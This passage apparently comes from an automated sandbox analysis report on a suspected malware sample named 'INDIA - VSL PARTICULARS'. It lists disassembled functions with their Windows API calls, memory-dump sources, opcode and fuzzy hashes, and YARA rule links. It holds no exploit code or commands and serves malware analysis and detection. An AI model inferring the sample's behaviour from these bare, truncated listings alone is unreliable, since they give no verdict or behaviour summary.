                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                              • String ID: crts
                              • API String ID: 943502515-3724388283
                              • Opcode ID: 6bd881ada2ae8ff0a5326c51e5497572252972d1a55ad2f97464bff4f718433f
                              • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                              • Opcode Fuzzy Hash: 6bd881ada2ae8ff0a5326c51e5497572252972d1a55ad2f97464bff4f718433f
                              • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                              Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                              • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                              • SetErrorMode.KERNEL32(?), ref: 0045D35C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$LabelVolume
                              • String ID: \VH
                              • API String ID: 2006950084-234962358
                              • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                              • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                              • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                              • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                              Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetMenuItemInfoW.USER32 ref: 00449727
                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                              • DrawMenuBar.USER32 ref: 00449761
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$InfoItem$Draw_malloc
                              • String ID: 0
                              • API String ID: 772068139-4108050209
                              • Opcode ID: c51535a36009e0b84663db87369d5282580437b440f7bb88edfbca7c2865f555
                              • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                              • Opcode Fuzzy Hash: c51535a36009e0b84663db87369d5282580437b440f7bb88edfbca7c2865f555
                              • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                              Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$_wcscpy
                              • String ID: 3, 3, 8, 1
                              • API String ID: 3469035223-357260408
                              • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                              • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                              • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                              • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                              Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCloseHandle
                              • API String ID: 2574300362-3530519716
                              • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                              • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                              • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                              • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                              Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCreateFile
                              • API String ID: 2574300362-275556492
                              • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                              • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                              • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                              • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                              Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpSendEcho
                              • API String ID: 2574300362-58917771
                              • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                              • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                              • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                              • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                              Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: RegDeleteKeyExW$advapi32.dll
                              • API String ID: 2574300362-4033151799
                              • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                              • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                              • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                              • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                              Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                              • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                              • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                              • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                              Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0047950F
                              • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                              • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                              • VariantClear.OLEAUT32(?), ref: 00479650
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$AllocClearCopyInitString
                              • String ID:
                              • API String ID: 2808897238-0
                              • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                              • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                              • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                              • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                              Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                              • __itow.LIBCMT ref: 004699CD
                                • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                              • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                              • __itow.LIBCMT ref: 00469A97
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$__itow
                              • String ID:
                              • API String ID: 3379773720-0
                              • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                              • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                              • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                              • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                              Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00449A4A
                              • ScreenToClient.USER32(?,?), ref: 00449A80
                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$ClientMoveRectScreen
                              • String ID:
                              • API String ID: 3880355969-0
                              • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                              • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                              • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                              • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                              Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                              • String ID:
                              • API String ID: 2782032738-0
                              • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                              • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                              • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                              • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                              Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                              Download Yara Rule
                              APIs
                              • ClientToScreen.USER32(00000000,?), ref: 0044169A
                              • GetWindowRect.USER32(?,?), ref: 00441722
                              • PtInRect.USER32(?,?,?), ref: 00441734
                              • MessageBeep.USER32(00000000), ref: 004417AD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Rect$BeepClientMessageScreenWindow
                              • String ID:
                              • API String ID: 1352109105-0
                              • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                              • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                              • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                              • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                              Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                              • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                              • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateHardLink$DeleteErrorFileLast
                              • String ID:
                              • API String ID: 3321077145-0
                              • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                              • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                              • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                              • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                              Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                              • __isleadbyte_l.LIBCMT ref: 004208A6
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
